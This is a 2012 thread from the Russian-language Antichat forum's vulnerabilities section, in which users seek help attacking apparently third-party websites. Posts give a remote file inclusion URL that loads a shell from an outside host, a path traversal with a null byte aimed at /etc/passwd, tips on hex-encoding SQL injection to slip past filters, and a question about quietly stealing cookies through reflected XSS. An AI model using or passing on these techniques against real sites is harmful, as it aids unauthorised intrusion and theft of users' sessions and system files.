HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21271  
Старый 28.08.2012, 12:02
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Помогите как инклудить при данной ошибке?

Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

Warning: include() [function.include]: Failed opening 'G.php' for inclusion (include_path='.:') in /var/www/x/x/x/x/x/x/index.php on line 71

Ссылка такого вида:

http://site.ru/dir/index.php?print&id=669

изменяю '669' выдазит уже mysql ошибка ,а мне нужен очень инклуд
 
Ответить с цитированием

  #21272  
Старый 28.08.2012, 13:05
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

blesse, if allow_url_fopen != Off:

http://site.ru/dir/index.php?print&id=http://mysite.com/shell
 
Ответить с цитированием

  #21273  
Старый 28.08.2012, 19:25
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Цитата:
Сообщение от Skofield  
Skofield said:
blesse
, if
allow_url_fopen
!= Off:
http://site.ru/dir/index.php?print&id=http://mysite.com/shell
вы думаете ,что я настолько глуп?

я же говорю

изменяю '669' вылазит уже mysql ошибка ,а мне нужен очень инклуд.

Может ошибка гдето в скпите и вообще нету инклуда тут?
 
Ответить с цитированием

  #21274  
Старый 29.08.2012, 02:10
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

2 o3,14um:

mysql hex -> unhex ( unhex(hexedstr) ), через php проходит в хексе, в мускуле как мы знаем преобразовывается, следовательно префикс должен порйти через фильтры в php. а -ля: +WHERE+table_name=0x707265665F7461626C(pref_tabl)

2 blesse:

Четко и ясно написано в error: INCLUDE. Из базы берется согласно идентификатору имя файла и инклудится. Теоретически, сформировав корректный mysql inject запрос, в поле вывода, которое подставляется в качестве аргумента в include, можно реализовать задуманное. Но во первых, поле может некорректно формироваться в следствие некоторых факторов при mysql-inj, к тому же эксепшены и тп могут явно подавлять последующий инклуд при некорректном mysql запросе и тп. Может быть такое что скуля сформирована, параметр в инклуд передается, но визуально это явно не отображается.
 
Ответить с цитированием

  #21275  
Старый 29.08.2012, 02:28
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Cennarios

2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
 
Ответить с цитированием

  #21276  
Старый 29.08.2012, 03:30
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
Cennarios
2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
Да, на самом деле. Не думаю что фильтр настолько туп ,чтобы вида (символ)pref_ пропускал ) Моя невнимательность.
 
Ответить с цитированием

  #21277  
Старый 29.08.2012, 12:13
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Нешел другой инклуд:

http://site/patch/index.php?X=G&F=blalalal

Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

Fatal error: require() [function.require]: Failed opening required 'namesutf8-blalalal' (include_path='.:') in /x/x/x/x/x/x/index.php on line 37

как я понимаю тоже бесполезный?

при изменеии переменной в ошибке оставется часть namesutf8-

Т.Е. при http://site/patch/index.php?X=G&F=../../../../../../../../etc/passwd%00

вылазит:

Warning: require(namesutf8-../../../../../../../../etc/passwd)
 
Ответить с цитированием

  #21278  
Старый 29.08.2012, 16:30
Manok
Guest
Сообщений: n/a
Провел на форуме:
3822

Репутация: 0
По умолчанию

Античат, помоги.

Есть некая страница.

page.php?text=Тест

этот text параметр выводится на странице. XSS работает, пробовал alert.

Фильтрации нет вообще видимо.

Можно ли как то вставить туда php код?
 
Ответить с цитированием

  #21279  
Старый 29.08.2012, 16:33
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Цитата:
Сообщение от Manok  
Manok said:
Античат, помоги.
Есть некая страница.
page.php?text=Тест
этот text параметр выводится на странице. XSS работает, пробовал alert.
Фильтрации нет вообще видимо.
Можно ли как то вставить туда php код?
Нет.
 
Ответить с цитированием

  #21280  
Старый 29.08.2012, 16:34
Manok
Guest
Сообщений: n/a
Провел на форуме:
3822

Репутация: 0
По умолчанию

Жаль. А что можно с этого полезного поиметь? Страница общедоступна.

Можно ли как то скрыто стянуть куки, если разместить этот юрл в айфрейме, например?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ